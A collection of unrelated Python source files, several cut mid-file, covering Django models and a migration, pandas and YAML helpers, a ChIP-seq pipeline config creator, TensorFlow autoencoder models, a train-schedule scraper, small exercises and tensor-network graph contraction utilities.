return False
if self.is_update() and not self.shared_secret and not self.topic:
return False
return True
# ----------------------------------------------------------------------------------------------------------------
def is_import(self):
return self.__opts.import_peers
def is_create(self):
return self.__opts.create is not None
def is_update(self):
return self.__opts.update is not None
def is_remove(self):
return self.__opts.remove is not None
# ----------------------------------------------------------------------------------------------------------------
@property
def list(self):
return self.__opts.list
@property
def missing(self):
return self.__opts.missing
@property
def create_hostname(self):
return None if self.__opts.create is None else self.__opts.create[0]
@property
def create_tag(self):
return None if self.__opts.create is None else self.__opts.create[1]
@property
def create_shared_secret(self):
return None if self.__opts.create is None else self.__opts.create[2]
@property
def create_topic(self):
return None if self.__opts.create is None else self.__opts.create[3]
@property
def update_hostname(self):
return self.__opts.update
@property
def remove_hostname(self):
return self.__opts.remove
@property
def hostname(self):
return self.__opts.hostname
@property
def shared_secret(self):
return self.__opts.shared_secret
@property
def topic(self):
return self.__opts.topic
@property
def aws(self):
return self.__opts.aws
@property
def echo(self):
return self.__opts.echo
@property
def indent(self):
return self.__opts.indent
@property
def verbose(self):
return self.__opts.verbose
# ----------------------------------------------------------------------------------------------------------------
def print_help(self, file):
self.__parser.print_help(file)
def __str__(self, *args, **kwargs):
return "CmdMQTTPeers:{import:%s, list:%s, missing:%s, create:%s, update:%s, " \
"remove:%s, hostname:%s, shared_secret:%s, topic:%s, aws:%s, echo:%s, indent:%s, " \
"verbose:%s}" % \
(self.__opts.import_peers, self.list, self.missing, self.__opts.create, self.__opts.update,
self.__opts.remove, self.hostname, self.shared_secret, self.topic, self.aws, self.echo, self.indent,
self.verbose)
|
15,787 | c95d1dc0491a4a58b064ff67f3deb6f50205dd52 | # -*- coding: utf-8 -*-
from django.db import models
class product_categories(models.Model):
category_name = models.CharField(max_length=100)
category_order = models.IntegerField(default=0)
def __unicode__(self):
return self.category_name
class Meta:
ordering = ["category_order"]
verbose_name = 'Product Category'
verbose_name_plural = 'Product Categories'
class page_container(models.Model):
page_title = models.CharField('Title', max_length=200)
page_content = models.TextField('Content', max_length=1200)
page_order = models.IntegerField('Order of Page', default=0)
page_categories = models.ForeignKey(product_categories, verbose_name="Category")
page_context_links = models.ManyToManyField('self', blank=True, symmetrical=False)
"""
In Python 3 __unicode__ will need to be replaced by __str__ (?)
"""
def __unicode__(self):
return self.page_title
return self.page_content
class Meta:
ordering = ["page_order"]
verbose_name = 'Product Detail'
verbose_name_plural = 'Product Details'
|
15,788 | 55689134cef6ef8091e660b31b4adaa364283398 | # %%
import pandas as pd
from pathlib import Path
# import yaml
# %%
def panda_to_yaml(filename, obj_input):
"""Converts and exports a panda dataframe lexicon into a yaml file.
This can be used by pyContextNLP.
Use filename with .yml extension"""
filepath = Path.cwd() / "negation" / "output" / filename
open(filepath, "w")
with open(filepath, "a") as stream:
# Each row represents one document in the yaml file
for row_index in obj_input.index:
# Each column represents one object per document in yaml file
for col in obj_input.columns:
# Value corresponding to curent document and object
value = obj_input.at[row_index, col]
if pd.isna(value):
# If no value is present, we write '' as value to object
stream.write("{}: ''\n".format(col))
else:
stream.write("{}: {}\n".format(col, value))
# Add yaml document separator followed by "\n"
stream.write("---\n")
# %%
def gen_regex(df):
"""
Function to transform dataframe with synonyms into regex patterns.
First column should be literals, subsequent columns should be synonyms
"""
# Save synonym columns in list, to loop over synonyms per target
columns = []
for column in df.columns:
columns.append(column)
# Remove category and literal, because these don't contain synonyms
columns.remove("category", "literal")
# Initialize new DataFrame to store new values:
# Two columns: literal and regex
new_df = pd.DataFrame(columns=["category", "literal", "regex"])
new_df_index = 0
# Generate the regex and literal strings per row of the input df
for row_index in df.index:
# Literal can be copied directly
lit = df.at[row_index, "literal"]
cat = df.at[row_index, "category"]
synonyms = []
# Synonyms extracted from the columns
for syn_col in columns:
synonym = df.at[row_index, syn_col]
# If particular cell is empty, don't append to list
if pd.isna(synonym):
# print("empty string")
pass
else:
synonyms.append(synonym)
# Generate regex pattern including all synonyms:
regex = ""
i = 0
n = len(synonyms)
for synonym in synonyms:
i += 1
# If current loop is last synonym of list:
if i == n:
# Don't add another | <or> operator to regex pattern
addition = f"({synonym})"
else:
# Include '|' to pattern, for following additions
addition = f"({synonym})|"
regex = regex + addition
# Add values to new row in df
new_df.loc[new_df_index] = \
pd.Series({"category": cat, "literal": lit, "regex": regex})
new_df_index += 1
return(new_df)
# # %%
# # nl_mod comes from lexicon_to_df.py
# obj_input = nl_mod
# # replace all empty values with NaN
# obj_input = obj_input.replace("", np.nan, regex=False)
# panda_to_yaml("output.yml", obj_input)
# %%
|
15,789 | 0bf74afcf402fd53bceb964876a6fbd0083a710a | num1,num2=map(int,input().split())
n=[]
for i in range(num1+1,num2+1):
if i>1:
for v in range(2,i):
if(i%v==0):
break
else:
n.append(v)
print(len(n)+1)
|
15,790 | f6aff11ed442b512c0d4c423970f48186f61c880 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('rca', '0010_auto_20150928_1413'),
]
operations = [
migrations.RemoveField(
model_name='homepage',
name='packery_alumni',
),
migrations.AlterField(
model_name='homepage',
name='packery_alumni_stories',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of alumni stories to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_blog',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of blog items to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_events',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of events to show (excluding RCA Talks)', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_events_rcatalks',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of RCA Talk events to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_news',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of news items to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_rcanow',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of RCA Now items to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_research',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of research items to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_review',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of reviews to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_staff',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of staff to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_student_stories',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of student stories to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_student_work',
field=models.IntegerField(blank=True, help_text=b'Student pages flagged to Show On Homepage must have at least one carousel item', null=True, verbose_name=b'Number of student work items to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
migrations.AlterField(
model_name='homepage',
name='packery_tweets',
field=models.IntegerField(blank=True, help_text=b'', null=True, verbose_name=b'Number of tweets to show', choices=[(0, 0), (1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10)]),
),
]
|
15,791 | b8251a20f12e0cc68661cd24c49265a8498969e1 | ################################################################################
# CHIP-seq pipeline configuration file creator #
################################################################################
# MODULES ----------------------------------------------------------------------
import argparse, os, csv, yaml, sys
# GLOBALS ----------------------------------------------------------------------
layouts = ['single', 'paired']
singleEndSampleSheetHeaders = ['SAMPLE','REPLICATE','LIBRARY','LANE','R1']
pairedEndSampleSheetHeaders = singleEndSampleSheetHeaders + ['R2']
# ARGUMENTS --------------------------------------------------------------------
parser = argparse.ArgumentParser(description='CHIP-seq pipeline configuration '
'file creator.')
parser.add_argument('--sampleSheet', dest='sampleSheet', action='store',
help='Absolute path to sample sheet.')
parser.add_argument('--layout', dest='layout', action='store',
help='Sequencing layout, single or paired.')
parser.add_argument('--genome', dest='genome', action='store',
help='Absolute path to reference genome; must be indexed with bwa.')
parser.add_argument('--outputDir', dest='outputDir', action='store',
help='Absolute path to the output directory, will be created MUST NOT EXIST.')
parser.add_argument('--controlTracks', dest='controlTracks', action='store',
help='Absolute path to control tracks / TODO.')
parser.add_argument('--execDir', dest='execDir', action='store',
help='Path to pipeline git repository.')
args = parser.parse_args()
# CHECK ARGUMENTS --------------------------------------------------------------
# OUTPUT DIRECTORY ---
if os.path.isdir(args.outputDir):
raise Exception("STOP! Directory {} already exist, the script stoped "
"to prevent overwrite.".format(args.outputDir))
# SAMPLE SHEET ---
if not os.path.isfile(args.sampleSheet):
raise Exception("Cannot find sample sheet at {}".format(args.sampleSheet))
# CONTROL TRACKS ---
# # TODO: add control tracks support
# LAYOUT ---
if args.layout not in layouts:
raise Exception("Invalid layout, choose from: {}".format(layouts))
# GENOME ---
if not os.path.isfile(args.genome):
raise Exception("Genome file ({}) not found.".format(args.genome))
# EXECDIR ---
if not os.path.isdir(args.execDir):
raise Exception("Code folder {} not found.".format(args.execDir))
if not args.execDir.endswith("/"):
args.execDir = args.execDir + "/"
# PARSE SAMPLE FILE ------------------------------------------------------------
sampleFileAsDict = csv.DictReader(open(args.sampleSheet), delimiter="\t")
print(i for i in sampleFileAsDict)
# CREATE OUPUT DIRECTORY -------------------------------------------------------
if not args.outputDir.endswith("/"):
args.outputDir = args.outputDir + "/"
try:
os.makedirs(args.outputDir)
except:
raise Exception("Cannot create output directory "
"at: {}".format(args.outputDir))
os.makedirs(args.outputDir + "slurm_logs/")
# WRITE CONFIGURATION FILE -----------------------------------------------------
sampleFileFormat = \
singleEndSampleSheetHeaders if args.layout == 'single' \
else pairedEndSampleSheetHeaders
sampleFileReader = csv.DictReader(open(args.sampleSheet), delimiter=',')
dictStore = {}
for line in sampleFileReader:
for field in sampleFileFormat:
if field not in line:
raise Exception("Sample file as invalid format.")
if line["SAMPLE"] not in dictStore:
dictStore[line["SAMPLE"]] = {}
if line["REPLICATE"] not in dictStore[line["SAMPLE"]]:
dictStore[line["SAMPLE"]][line["REPLICATE"]] = {}
if line["LIBRARY"] not in dictStore[line["SAMPLE"]][line["REPLICATE"]]:
dictStore[line["SAMPLE"]][line["REPLICATE"]][line["LIBRARY"]] = {}
dictStore[line["SAMPLE"]][line["REPLICATE"]][line["LIBRARY"]]\
[line["LANE"]] = {}
dictStore[line["SAMPLE"]][line["REPLICATE"]][line["LIBRARY"]]\
[line["LANE"]]["R1"] = line["R1"]
if args.layout == "paired":
dictStore[line["SAMPLE"]][line["REPLICATE"]][line["LIBRARY"]]\
[line["LANE"]]["R2"] = line["R2"]
readTag = "\'@RG\\tID:{0}\\tLB:{1}\\tPL:{2}\\tSM:{3}\'".\
format(line["SAMPLE"] + "_" + line["REPLICATE"],
line["LIBRARY"], "ILLUMINA", line["LANE"])
dictStore[line["SAMPLE"]][line["REPLICATE"]][line["LIBRARY"]]\
[line["LANE"]]["rgTag"] = readTag
dictStorePrint = {}
dictStorePrint["samples"] = dictStore
# PRINT COHORT STRUCTURE -------------------------------------------------------
with open(args.outputDir + "config.yaml", "w") as outFile:
outFile.write("# --- CHIP-seq pipeline configuration file ---\n")
outFile.write("config: {}config.yaml\n".format(args.outputDir))
outFile.write("outputDir: {}\n".format(args.outputDir))
outFile.write("execDir: {}\n".format(args.execDir))
outFile.write("sampleSheet: {}\n".format(args.sampleSheet))
outFile.write("slurmLogs: {}\n".format(args.outputDir + "slurm_logs/"))
outFile.write("layout: {}\n".format(args.layout))
outFile.write("genome: {}\n".format(args.genome))
outFile.write(yaml.dump(dictStorePrint))
|
15,792 | 9ab2105856eeb91c8c36a75aa91e2e761bccb3dd | import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2DTranspose, Input, Bidirectional, InputLayer, Conv2D, Dense, \
BatchNormalization, LeakyReLU, Activation, Dropout, Concatenate, ZeroPadding2D, Reshape, RepeatVector, Flatten, \
Lambda
import tensorflow.keras.backend as K
from skimage.metrics import structural_similarity as ssim
def PartEncoderModel(shape_size, n_layers, ef_dim=32, z_dim=128):
model = Sequential()
out_channels = ef_dim
for i in range(n_layers - 1):
if i == 0:
model.add(ZeroPadding2D(input_shape=shape_size))
else:
model.add(ZeroPadding2D())
model.add(Conv2D(filters=out_channels, kernel_size=(4, 4), strides=(2, 2)))
model.add(BatchNormalization(momentum=0.1))
model.add(LeakyReLU(alpha=0.02))
out_channels = out_channels * 2
model.add(Conv2D(filters=z_dim, kernel_size=(4, 4), strides=(1, 1)))
model.add(Activation('sigmoid'))
model.add(Flatten())
return model
def PartEncoderModelConditional(shape_size, n_layers, class_size, ef_dim=32, z_dim=128):
x1 = Input(shape=shape_size)
x2 = Input(shape=(class_size, ))
dim1 = shape_size[0]
dim2 = shape_size[1]
units = dim1 * dim2
x3 = Dense(units, activation='relu')(x2)
x = Dense(units, activation='relu')(x3)
x = Reshape((dim1, dim2, 1))(x)
x = Concatenate()([x1, x])
layers = []
out_channels = ef_dim
for i in range(n_layers - 1):
if i == 0:
layers.append(ZeroPadding2D())
else:
layers.append(ZeroPadding2D())
layers.append(Conv2D(filters=out_channels, kernel_size=(4, 4), strides=(2, 2)))
layers.append(BatchNormalization(momentum=0.1))
layers.append(LeakyReLU(alpha=0.02))
out_channels = out_channels * 2
layers.append(Conv2D(filters=z_dim, kernel_size=(4, 4), strides=(1, 1)))
layers.append(Activation('sigmoid'))
layers.append(Flatten())
for l in layers:
x = l(x)
return Model(inputs=[x1, x2], outputs=x)
def PartReconstructModel(n_layers, f_dim, z_dim):
in_channels = z_dim
out_channels = f_dim * (2 ** (n_layers - 2))
layers = []
layers.append(Reshape((1, 1, in_channels), input_shape=(in_channels,)))
layers.append(Conv2DTranspose(filters=out_channels, kernel_size=(4, 4), strides=1))
for i in range(n_layers - 1):
out_channels = out_channels // 2
if i == n_layers - 2:
out_channels = 3
layers.append(Conv2DTranspose(filters=out_channels, kernel_size=(4, 4), strides=(2, 2)))
layers.append(LeakyReLU(alpha=0.02))
if i % 2 == 0:
layers.append(Conv2D(filters=out_channels, kernel_size=(4, 4), strides=1))
layers.append(LeakyReLU(alpha=0.02))
layers.append(Activation('sigmoid'))
rgb_reconstruct = Sequential(layers)
return rgb_reconstruct
def PartReconstructModelConditional(n_layers, f_dim, z_dim, class_size):
in_channels = z_dim
out_channels = f_dim * (2 ** (n_layers - 2))
x = Input(shape=(in_channels,))
d_1 = Dense(40)(x)
d_1 = LeakyReLU()(d_1)
d_1 = Dense(40)(d_1)
d_1 = LeakyReLU()(d_1)
d_1 = Dense(class_size, activation='softmax')(d_1)
layers = []
layers.append(Reshape((1, 1, in_channels)))
layers.append(Conv2DTranspose(filters=out_channels, kernel_size=(4, 4), strides=1))
for i in range(n_layers - 1):
out_channels = out_channels // 2
if i == n_layers - 2:
out_channels = 3
layers.append(Conv2DTranspose(filters=out_channels, kernel_size=(4, 4), strides=(2, 2)))
layers.append(LeakyReLU(alpha=0.02))
if i % 2 == 0:
layers.append(Conv2D(filters=out_channels, kernel_size=(4, 4), strides=1))
layers.append(LeakyReLU(alpha=0.02))
layers.append(Activation('sigmoid'))
x_2 = x
for l in layers:
x_2 = l(x_2)
return Model(inputs=x, outputs=[d_1, x_2])
def PartClassifierModel(shape_size, n_layers, ef_dim=32, z_dim=128):
model = Sequential()
out_channels = ef_dim
for i in range(n_layers - 1):
if i == 0:
model.add(ZeroPadding2D(input_shape=shape_size))
else:
model.add(ZeroPadding2D())
model.add(Conv2D(filters=out_channels, kernel_size=(4, 4), strides=(2, 2)))
model.add(BatchNormalization(momentum=0.1))
model.add(LeakyReLU(alpha=0.02))
out_channels = out_channels * 2
model.add(Conv2D(filters=z_dim, kernel_size=(4, 4), strides=(1, 1)))
model.add(LeakyReLU())
model.add(Flatten())
model.add(Dense(60))
model.add(LeakyReLU())
model.add(Dense(30))
model.add(LeakyReLU())
model.add(Dense(10, activation='softmax'))
return model
def PartDecoderModel(n_layers, f_dim, z_dim):
in_channels = z_dim + 2
out_channels = f_dim * (2 ** (n_layers - 2))
x = Input(shape=(in_channels,))
layers = []
for i in range(n_layers - 1):
if i > 0:
in_channels += z_dim + 2
if i < 4:
l = [Dense(out_channels), Dropout(rate=0.4), LeakyReLU()]
# model.append([nn.Linear(in_channels, out_channels), nn.Dropout(p=0.4), nn.LeakyReLU()])
else:
l = [Dense(out_channels), LeakyReLU()]
# model.append([nn.Linear(in_channels, out_channels), nn.LeakyReLU()])
in_channels = out_channels
out_channels = out_channels // 2
layers.append(Sequential(l))
l = [Dense(1), Activation('sigmoid')]
layers.append(Sequential(l))
out = layers[0](x)
for i in range(1, n_layers - 1):
out = layers[i](Concatenate(axis=1)([out, x]))
out = layers[n_layers - 1](out)
return Model(inputs=x, outputs=out)
# model.append([nn.Linear(in_channels, 1), nn.Sigmoid()])
class PartAE(tf.keras.Model):
def __init__(self, input_shape, en_n_layers=5, ef_dim=32, de_n_layers=5, df_dim=32, z_dim=128, is_class_conditioning=False):
super(PartAE, self).__init__()
self.z_dim = z_dim
if is_class_conditioning==False:
self.encoder = PartEncoderModel(input_shape, en_n_layers, ef_dim, z_dim)
else:
self.encoder = PartEncoderModelConditional(input_shape, en_n_layers, 10, ef_dim, z_dim)
# self.decoder = PartDecoderModel(de_n_layers, df_dim, z_dim)
if is_class_conditioning==False:
self.reconstruct = PartReconstructModel(de_n_layers, df_dim, z_dim)
else:
self.reconstruct = PartReconstructModelConditional(de_n_layers, df_dim, z_dim, 10)
self.class_conditioning = is_class_conditioning
# print(self.encoder.outputs[0].shape)
def call(self, x):
if self.class_conditioning == False:
encoded_out = self.encoder(x)
reconstruct_out = self.reconstruct(encoded_out)
return reconstruct_out
else:
encoded_out = self.encoder(x)
classifier_out, reconstruct_out = self.reconstruct(encoded_out)
return reconstruct_out, classifier_out
# print(reconstruct_out.shape)
# encoded_out = tf.expand_dims(encoded_out, axis=1)
# encoded_out = tf.tile(encoded_out, multiples=(1, x[1].shape[1], 1))
# encoded_out = tf.reshape(encoded_out, shape=(-1, self.z_dim))
# point_input = tf.reshape(x[1], (-1, x[1].shape[2]))
# concat_out = tf.concat([encoded_out, point_input], axis=1)
# out = self.decoder(concat_out)
# out = tf.reshape(out, shape=(x[0].shape[0], x[1].shape[1], -1))
# print(out.shape)
# print(reconstruct_out.shape)
def custom_loss(y_true, y_pred):
y_recon = y_true[:, :, :, :-1]
y_mask = tf.expand_dims(y_true[:, :, :, -1], axis=3)
y_mask = tf.tile(y_mask, [1, 1, 1, 3])
print(y_mask.shape)
print(y_recon.shape)
print(y_pred.shape)
loss = K.square(y_recon - y_pred) * y_mask
return tf.reduce_sum(loss) / tf.reduce_sum(y_mask)
def custom_ssim(y_true, y_pred):
y_recon = y_true[:, :, :, :-1]
y_mask = tf.expand_dims(y_true[:, :, :, -1], axis=3)
y_mask = tf.tile(y_mask, [1, 1, 1, 3])
print(y_mask.shape)
print(y_recon.shape)
print(y_pred.shape)
#y_pred = y_pred * y_mask
loss = tf.reduce_mean(tf.image.ssim(y_pred, y_recon, 1.0))
return 1.0 - loss
if __name__ == "__main__":
tf.config.experimental_run_functions_eagerly(True)
# model = PartImNetAE(6, 32, 6, 32, 138)
model = PartAE((64, 64, 1), en_n_layers=5, de_n_layers=5)
print(model.encoder.summary())
print(model.decoder.summary())
print(model.reconstruct.summary())
# print(model.summary())
# model = PartDecoderModel(32, 5, 5, 32, 128)
# print(model.decoder.summary())
x = tf.random.normal(shape=(32, 64, 64, 1)) # masks
y = tf.random.normal(shape=(32, 5, 2)) # points taken from 0-1
gt_point = tf.random.normal(shape=(32, 5, 1)) # classification for every image-point pair
gt_reconstruct = tf.random.normal((32, 64, 64, 3)) # rgb reconstruct for image
gt_reconstruct_final = tf.concat([gt_reconstruct, x], 3)
print(gt_reconstruct_final.shape)
print(model.encoder.inputs)
model.compile(loss=[custom_loss, 'mse'], optimizer='adam')
model.fit(x=[x, y], y=[gt_reconstruct_final, gt_point], epochs=2)
model.save_weights('model_partae.h5')
# out = model([x, y])
# print(out)
|
15,793 | 7eb4cbc353cff89f24ec5b1bb91aef4120ae88f6 | from cumulusci.robotframework.pageobjects import ListingPage
from cumulusci.robotframework.pageobjects import pageobject
from BaseObjects import BaseNPSPPage
from NPSP import npsp_lex_locators
@pageobject("Listing", "General_Accounting_Unit__c")
class GAUListPage(BaseNPSPPage, ListingPage):
def _is_current_page(self):
"""
Waits for the current page to be a Data Import list view
"""
self.selenium.wait_until_location_contains("/list",timeout=60, message="Records list view did not load in 1 min")
self.selenium.location_should_contain("General_Accounting_Unit__c",message="Current page is not a DataImport List view")
|
15,794 | e39073ee0f044586559ea8619f9613f186861fd9 | #epic
import requests, time
while True:
r = requests.get('https://www.epicgames.com/store/ru/')
print(r)
time.sleep(10)
if r.status_code == 200:
print("Епик готов раздавать халяву")
break
input() |
15,795 | 4424dc0375e7bbc5e419524d95cb0364428e5d87 | from nose.tools import assert_equal
def median(arr1, arr2):
i = j = k = 0
while k < len(arr1) + 1:
if k > 0:
before = current
if i < len(arr1) and arr1[i] < arr2[j]:
current = arr1[i]
i += 1
else:
current = arr2[j]
j += 1
k += 1;
return (before + current)/2
class medianTest:
def test(self, func):
assert_equal(func([1, 12, 15, 26, 38], [2, 13, 17, 30, 45]), 16)
assert_equal(func([1, 10, 13, 15], [2, 4, 6, 7]), 6.5)
assert_equal(func([1, 2], [4, 5]), 3)
print("TESTS PASSED")
t = medianTest()
t.test(median) |
15,796 | 8958392de2b0a36dc2c63a642fb09d31ad168a2c | import pandas
import ssl
import json
import sqlite3
#ignore ssl certificate exams
ctx=ssl.create_default_context()
ctx.check_hostname=False
ctx.verify_mode=ssl.CERT_NONE
# ALGORITHM:
# CREATE DATABASE TABLE FOR SCHEDULES
# FETCH TRAINS FROM DATABASE IN LOOP
# VISIT THAT URL AND GET THE SCHEDULE IN TABLE
# CONVERT TO JSON
# SAVE THE JSON DATA TO DATABASE
# CREATE A JOIN QUERY SO AS TO DEMONSTRATE THAT THE RECORDS HAVE BEEN SAVED OR NOT (OPTIONAL)
#*********************CREATE DATABASE********************************************************
conn=sqlite3.connect('train.sqlite')
cur=conn.cursor()
#cur.execute("DROP TABLE IF EXISTS Schedules")
cur.execute('''CREATE TABLE IF NOT EXISTS Schedules(
tr_number INTEGER NOT NULL,
st_code TEXT,
arrival_daytime TEXT,
dept_daytime TEXT,
distance_km INTEGER)''')
#*******************MAIN PROCESS LOOP********************************************************
trno=input('enter train num:')
url="https://etrain.info/in?TRAIN="+str(trno)
tables=pandas.read_html(url)
print(tables[14])
inp=input("enter y or n? ")
if inp=='y':
tablesjson=tables[14].to_json(orient="records")
info=json.loads(tablesjson)
#print(json.dumps(info, indent=4))
for i in range(2,len(info)-1):
cur.execute('INSERT INTO Schedules(tr_number,st_code,arrival_daytime,dept_daytime,distance_km) VALUES (?,?,?,?,?)',
(trno,info[i]["1"],info[i]["3"],info[i]["4"],info[i]["5"]))
print(trno,info[i]["1"],info[i]["3"],info[i]["4"],info[i]["5"])
conn.commit()
else: print("ok!")
|
15,797 | d8befbf3e19f8acebd809ac1763bcb4df33c9382 |
s = set(['admin', 'cc', 'dd', '33'])
print s
print 'admin' in s
|
15,798 | 7f1c64ca3c405012c4e05a1d2186f81183a18b3d | #!/usr/bin/env python
#from sets import Set
import sys, math
def find_all_path_pool(g, start, end, pool=set([]), path=[]):
path = path+[start]
if start==end:
if len(path) == len(g.keys()):
return [path]
return []
if not g.has_key(start):
return []
paths = []
path_nodes = set(path)
new_nodes = set(g[start])-path_nodes
pool = pool | new_nodes
if len(pool)==0:
return []
while len(pool)>0:
node = pool.pop()
newpaths = find_all_path_pool(g, node, end, pool, path)
for newpath in newpaths:
paths.append(newpath)
return paths
def find_all_path(g, start, end, path=[]):
path = path+[start]
if (start==end):
if len(path) == len(g.keys()):
return [path]
return []
if not g.has_key(start):
return []
paths = []
for node in g[start]:
if node not in path:
newpaths = find_all_path(g, node, end, path)
for newpath in newpaths:
paths.append(newpath)
return paths
def gnode(gmera):
g = {}
for k in gmera.keys():
if not g.has_key(k):
g[k] = []
for leg in gmera[k]:
for kp in gmera.keys():
if kp != k:
if (leg in gmera[kp]) and (not kp in g[k]):
g[k].append(kp)
return g
def contract_gmera(gmera, path, pr= False):
if pr:
print path
S1 = set(gmera[path[0]])
S2 = set(gmera[path[1]])
SS = S1&S2
St = (S1|S2)-SS
max_leg = len(St)
max_comp = len(St)+len(SS)
base = 100.
cost = 0.
if pr:
print S1, S2
print str(path[1])+',', len(St), len(St)+len(SS), St
for p in path[2:]:
S1 = St
S2 = set(gmera[p])
SS = S1&S2
St = (S1|S2)-SS
comp = len(St)+len(SS)
max_leg = max(max_leg, len(St))
max_comp = max(max_comp, comp)
cost = cost + math.pow(base, comp)
if pr:
print str(p)+',', len(St), len(St)+len(SS), St
if len(St) != 0:
print St
return -1,-1
return max_leg, max_comp, cost
def GC2GE(gc):
ge = {}
gm = {}
ne = 0
for node in gc.keys():
i = 0
gm[node] = []
for edge in gc[node]:
i+=1
if ge.has_key((node,i)):
print "error"
if not ge.has_key(edge):
ne += 1
ge[(node,i)] = [edge, ne]
gm[node].append(ne)
else:
ge[(node,i)] = [edge, ge[edge][1]]
gm[node].append(ge[edge][1])
return ge,gm
def check_graph(g):
res = True
for k in g.keys():
e = 0
for v in g[k]:
e += 1
nk,ne = g[v[0]][v[1]-1]
if k != nk :
res = False
print 'graph not consistent', k, e, nk, ne
return res
def Add_Graph(gx1, gx2):
k1s = set(gx1.keys())
k2s = set(gx2.keys())
keys_comm = k1s & k2s
new_keys = k1s ^ k2s
ng = {}
for k1 in (k2s-k1s):
nv = []
for v in gx2[k1]:
if (v[0] not in keys_comm) :
nv.append(v)
else:
nv.append(gx1[v[0]][v[1]-1])
ng[k1] = nv
for k1 in (k1s-k2s):
nv = []
for v in gx1[k1]:
if (v[0] not in keys_comm):
nv.append(v)
else:
nv.append(gx2[v[0]][v[1]-1])
ng[k1] = nv
return ng
def Simplify_Graph(g):
ng = Simplify_Graph_I(g)
# print_graph(ng)
ng = Simplify_Graph_U(ng)
ng = Simplify_Graph_W3(ng)
ng = Simplify_Graph_O(ng)
return ng
def Combine_OO(g1,g2):
ng = {}
o1 = g1['OO']
o2 = g2['OO']
leg1 = [0]*100
leg2 = [0]*100
len1 = len(o1)/2
len2 = len(o2)/2
for i in xrange(1, len1+1):
leg1[i] = i
leg1[i+len1] = i+len1+len2
for i in xrange(1, len2+1):
leg2[i] = i+len1
leg2[i+len2] = i+len1*2+len2
noo = []
for i in xrange(0, len1):
noo.append(o1[i])
for i in xrange(0, len2):
noo.append(o2[i])
for i in xrange(len1, len1+len1):
noo.append(o1[i])
for i in xrange(len2, len2+len2):
noo.append(o2[i])
ng['OO'] = noo
for k in g1.keys():
if k == "OO": continue
noo = []
oo = g1[k]
for kk in oo:
if kk[0] == 'OO':
nleg = leg1[kk[1]]
noo.append((kk[0],nleg))
else:
noo.append(kk)
ng[k] = noo
for k in g2.keys():
if k == "OO": continue
noo = []
oo = g2[k]
for kk in oo:
if kk[0] == 'OO':
nleg = leg2[kk[1]]
noo.append((kk[0],nleg))
else:
noo.append(kk)
ng[k] = noo
return ng
# ng = g
# I_V = set([])
# nng = {}
# for k in ng.keys():
# if k == "OO":
# ks = "OO"
# s = "0"
# else:
# ks,s = k.split("_", 1)
# if (ks == "OO"):
# s = True
# for v in ng[k]:
# if v[0] != k:
# s = False
# break
# if not s:
# nng[k] = ng[k]
# else:
# nng[k] = ng[k]
# nk = []
# for k in nng.keys():
# if k == "OO":
# ks = "OO"
# e = "0"
# else:
# ks,e = k.split("_",1)
# if ks == "OO":
# nk.append(k)
# nk.sort(cmp)
# i = 0
# l = len(nk)
# gv = {}
# ov = [(0,0)]*2*l
# for k in nk:
# i+= 1
# nv = [("OO", i,), ("OO", i+l)]
# gv[k] = nv
# ov[i-1] = (k, 1)
# ov[i+l-1] = (k,2)
# gv["OO"] = ov
#
# return Add_Graph(gv, nng)
def Simplify_Graph_O(g):
# ng = Simplify_Graph_W(g)
# ng = Simplify_Graph_W4(g)
ng = g
I_V = set([])
nng = {}
for k in ng.keys():
ks,s = k.split("_", 1)
if (ks == "O"):
s = True
for v in ng[k]:
if v[0] != k:
s = False
break
if not s:
